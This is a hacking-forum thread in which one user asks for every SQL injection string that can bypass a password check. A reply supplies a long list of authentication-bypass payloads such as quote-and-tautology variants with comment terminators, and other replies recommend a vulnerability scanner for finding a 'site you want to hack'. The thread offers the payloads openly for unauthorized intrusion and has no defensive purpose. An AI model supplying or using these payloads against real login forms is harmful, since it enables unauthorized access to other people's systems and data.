Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


sql injection filter_list
Author
Message
sql injection #1
in sql injection for password we use some string like
1'or'1'='1
" or 1=1--
but i want to know all of the strings that i can use.
Can someone give me that? :8-s:

Reply

RE: sql injection #2
Firstly, you need to establish whether a given site Is vulnerable to SQL Injection. The commands are useless If It's not.

Have a look for a tool named "Acunetix", which tests for vulnerabilities.
Here's some strings to try:
Spoiler:
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
[Image: AD83g1A.png]

Reply

RE: sql injection #3
how to work with this tool "Acunetix"?

Reply

RE: sql injection #4
maybe you can enter the name of the site you want to hack and see if it's vulnerable or not... so it's like a scanner (haven't try it...)
[Image: ap8g35.jpg]

Reply